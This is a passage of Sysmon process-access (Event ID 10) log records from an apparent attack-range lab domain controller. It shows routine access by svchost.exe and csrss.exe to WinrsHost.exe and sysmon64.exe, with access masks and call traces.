C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-001091730400}","TargetProcessId":"4188","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2508,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-001091730400}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-001091730400}","TargetProcessId":"4188","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2509,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2510,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2511,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2512,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2513,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2514,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.301","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2515,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.301\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 